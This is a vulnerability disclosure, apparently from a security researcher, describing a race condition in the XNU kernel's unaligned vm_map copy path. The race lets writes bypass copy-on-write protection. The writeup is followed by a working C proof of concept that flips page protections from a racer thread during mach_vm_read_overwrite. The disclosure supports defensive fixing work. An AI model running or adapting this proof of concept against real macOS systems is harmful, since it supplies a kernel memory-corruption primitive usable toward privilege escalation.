// ianbeer
#if 0
XNU VM copy-on-write bypass due to incorrect shadow creation logic during unaligned vm_map_copy operations

Calling mach_vm_read_overwrite with a sufficiently large size can end up calling either
vm_map_copy_overwrite_aligned or vm_map_copy_overwrite_unaligned, potentially multiple times depending 
on the alignment of the source and destination. These functions directly manipulate the underlying 
vm_objects to perform the writes - when possible in an optimized way.

There is a curious semantic difference between the unaligned and aligned implementations:

aligned:

	if (entry->needs_copy) {
		VME_OBJECT_SHADOW(entry,
		    (entry->vme_end -
		    entry->vme_start));
		entry->needs_copy = FALSE;
	}
	dst_object = VME_OBJECT(entry);

unaligned:

	if (entry->needs_copy &&
	    ((entry->protection & VM_PROT_WRITE) != 0)) {
		if (vm_map_lock_read_to_write(dst_map)) {
			vm_map_lock_read(dst_map);
			goto RetryLookup;
		}
		VME_OBJECT_SHADOW(entry,
		    (vm_map_size_t)(entry->vme_end
		    - entry->vme_start));
		entry->needs_copy = FALSE;
		vm_map_lock_write_to_read(dst_map);
	}
	dst_object = VME_OBJECT(entry);

In the aligned case a shadow is always created before determining the destination object.

In the unaligned case a shadow is only created when the entry is needs_copy *and* the entry's protection is writable.

In the unaligned case this then proceeds on to call vm_fault_copy to write to dst_object.

It's important to note that vm_fault_copy *doesn't* "fault" the page in the context of the destination map - 
an operation that would itself create the shadow objects if necessary. 
vm_fault_copy instead directly requests individual RW pages from the vm_object:

		result = vm_fault_page(dst_object,
		    vm_object_trunc_page(dst_offset),
		    VM_PROT_WRITE | VM_PROT_READ,
		    FALSE,
		    FALSE,
		    &dst_prot, &dst_page, &dst_top_page,
		    (int *)0,
		    &error,
		    dst_map->no_zero_fill,
		    &fault_info_dst);

then wires those pages and performs a pmap physical page level copy operation.

The caller of vm_map_copy_overwrite_unaligned is vm_map_copy_overwrite_nested.

vm_map_copy_overwrite_nested does loop through the entire destination virtual address region to
check whether it's all writable in the destination map:

	for (entry = tmp_entry;;) {
		vm_map_entry_t  next = entry->vme_next;

		while (entry->is_sub_map) { ... }

		if (!(entry->protection & VM_PROT_WRITE)) {
			vm_map_unlock(dst_map);
			return KERN_PROTECTION_FAILURE;
		}

This should prevent us ever encountering a destination entry which is both needs_copy
and *not* VM_PROT_WRITE. The problem is that this isn't atomic - the destination map 
gets unlocked and relocked inside the loop which calls vm_fault_copy in vm_map_copy_overwrite_unaligned. 
So by ensuring that the destination region spans at least two different vm_objects 
(necessitating at least two calls to vm_fault_copy) we can modify the destination vm_map 
after the check in vm_map_copy_overwrite_nested to flip the VM_PROT_WRITE bit.

There are vm_map timestamp comparisons to detect vm_map modifications but those just cause the 
vm_map_entry to be looked up again without again checking all the preconditions checked in 
vm_map_copy_overwrite_nested. (There is another issue here - I will report that 
separately as it gives you a slightly different primitive, but arguably could be the same 
bug depending on your opinion.)

It's important to note that flipping the VM_PROT_WRITE bit *does* change the page table entries
for that mapping, and you can't flip them back without actually going through a real page fault, 
but vm_fault_copy *isn't* doing a "copyout" style copy (which would fault in the destination map 
context) - it's writing directly to the underlying vm_object (eventually via the physmap.)

The PoC is fairly hacky but it does demonstrate the ability to write to a copy-on-write protected 
page and have those writes visible to other copy-on-write mappings.

Tested on MacOS 12.6 on *Intel* 4kb physical page machine. The PoC makes a lot of assumptions 
about page size - there will be considerable work to make it work on 16kb machines 
(just changing the #define of PAGE_SIZE might not be sufficient!)

If you're fixing this issue and not familiar with any of the constructs used in the PoC or the 
XNU cow semantics and their security consequences *please* reach out - I am happy to help.

build this poc like this:

clang -O1 -o unaligned_write_to_cow_bypass unaligned_write_to_cow_bypass.c

After running for a short while it should print out:

  e1 isn't 'A'

You can use a kernel debugger to verify that this is bad. (I am still working on exploits for these
current COW bugs - but COW is a fundamental part of XNU and plenty of security relevant stuff
relies on it.)

#endif

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <sched.h>

#define PAGE_SIZE 0x1000

void key() {
  return;
  printf("press enter to continue...\n");
  size_t len = 0;
  fgetln(stdin, &len);
}

void* alloc_at(mach_vm_address_t desired_address, mach_vm_size_t size) {
  kern_return_t kr;
  mach_vm_address_t actual_address = desired_address;
  kr = mach_vm_allocate(mach_task_self(), &actual_address, size, VM_FLAGS_FIXED);
  if (kr != KERN_SUCCESS || actual_address != desired_address) {
    printf("fixed allocation at 0x%llx of size 0x%llx failed...\n", desired_address, size);
  }

  return (void*)desired_address;
}

volatile int running = 0;
volatile int keep_going = 1;

size_t obj_size = 256*1024;

void* thread_func(void* arg) {
  running = 1;
  mach_vm_address_t addr = (mach_vm_address_t)arg;
  while (1) {
    while(keep_going) {
      mach_vm_protect(mach_task_self(),
                      addr,
                      obj_size,
                      0,
                      VM_PROT_READ);
      usleep(100);
      //sched_yield();
      mach_vm_protect(mach_task_self(),
                      addr,
                      obj_size,
                      0,
                      VM_PROT_READ|VM_PROT_WRITE);
      //sched_yield();
      usleep(100);
      //printf("thread did a switch\n");
    }
    while (!keep_going) {;}
  }
  return NULL;
}


pthread_t th = NULL;

void test() {
  kern_return_t kr;


/*
  mach_vm_protect(mach_task_self(),
                  0x7ff880000000,
                  0x1000,
                  0,
                  VM_PROT_READ | VM_PROT_WRITE);
  printf("after\n");
  key();
*/


  mach_vm_address_t e0 = 0x4100000000;
  mach_vm_address_t e2 = e0 - obj_size;

  alloc_at(e0, obj_size);
  memset((void*)e0, 'A', obj_size);
  printf("allocated e0 at: 0x%llx\n", e0);
  key();

// don't want this to coalesce with e0
#if 0
  alloc_at(e2, obj_size);
  memset((void*)e2, 'B', obj_size);
#endif

  // make a memory object
  mach_port_t named_port = MACH_PORT_NULL;
  kr = mach_memory_object_memory_entry_64(
                        mach_host_self(),
                        1,
                        obj_size,
                        VM_PROT_READ | VM_PROT_WRITE,
                        MACH_PORT_NULL,
                        &named_port);
  if (kr != KERN_SUCCESS) {
    printf("failed to allocate memory object\n");
  }

  kr = mach_vm_map(mach_task_self(),
                 &e2,
                 obj_size,
                 0, // mask
                 VM_FLAGS_FIXED,
                 named_port,
                 0,
                 1, // copy
                 VM_PROT_READ | VM_PROT_WRITE,
                 VM_PROT_READ | VM_PROT_WRITE,
                 VM_INHERIT_NONE); // inheritance
  if (kr != KERN_SUCCESS) {
    printf("failed to map memory object copy at e2\n");
  }
  printf("mapped e2 at: 0x%llx\n", e2);

  printf("about to memset 0x%x bytes at 0x%llx to 'B'\n", obj_size, e2);
  memset((void*)e2, 'B', obj_size);
  key();


  // make a cow copy:
  mach_vm_address_t e1 = 0;
  mach_msg_type_number_t cow_read_size = obj_size;
  kr = mach_vm_read(mach_task_self(),
               e0,
               obj_size,
               (vm_offset_t*)&e1,
               &cow_read_size);

  if (kr != KERN_SUCCESS) {
    printf("making the COW read failed...?\n");
  }

  printf("allocated e1 (cow?) at: 0x%llx\n", e1);
  key();
  // allocate a source region:

  mach_vm_address_t e5 = 0x4200000000;
  alloc_at(e5, obj_size*2);
  memset((void*)e5, 'C', obj_size*2);
  /*
  printf("allocated e5 (source region) at: 0x%llx\n", e5);
  printf("about to perform the copy\n");
  printf("from: 0x%llx\n", e5);
  printf("for : 0x%llx\n", (2));
  printf("to  : 0x%llx\n", (e0-1));
  */
  key();

 
  // spin up the racer thread
  if (th == NULL) {
    running = 0;
    pthread_create(&th, NULL, thread_func, (void*)e0);
    while(running == 0) {;}
 }


  keep_going = 1;

  // do the unaligned object copy:

  /*
  mach_vm_size_t copied_size = ((PAGE_SIZE-1)*2);
  kr = mach_vm_read_overwrite(
    mach_task_self(),     // copy FROM this map
    e5,                   //      FROM this address
    ((PAGE_SIZE-1)*2),    //       FOR this many bytes
    ((e0+1) - PAGE_SIZE), //      TO this address in this current map 
    &copied_size);
  */

  printf("before: %c %c\n", (*(char*)(e0-1)), (*(char*)(e0)));

  mach_vm_size_t copied_size = ((PAGE_SIZE-1)*2);
  kr = mach_vm_read_overwrite(
    mach_task_self(),     // copy FROM this map
    e5,                   //      FROM this address
    obj_size,    //       FOR this many bytes
    (e2+1), //      TO this address in this current map 
    &copied_size);

  if (kr != KERN_SUCCESS) {
    printf("overwrite failed\n");
  } else {
    printf("overwrite succeeded\n");
  }
  
  key();

  // does e1 still have 'A's?
  if (*((char*)((e1))) != 'A') {
    printf("e1 isn't 'A'\n");
    sleep(100);
  } else {
    ;//printf("e1 is A\n");
  }

  printf("after: %c %c\n", (*(char*)(e0-1)), (*(char*)(e0)));


  keep_going = 0;
  //pthread_join(th, NULL);

  mach_vm_deallocate(mach_task_self(), e0, obj_size);
  mach_vm_deallocate(mach_task_self(), e1, obj_size);
  mach_vm_deallocate(mach_task_self(), e2, obj_size);
  mach_vm_deallocate(mach_task_self(), e5, obj_size*2);
  mach_port_deallocate(mach_task_self(), named_port);
}


int main(int argc, char** argv) {
  printf("pid: %d\n", getpid());
  while(1) {
    test();
  }
  return 0;
}
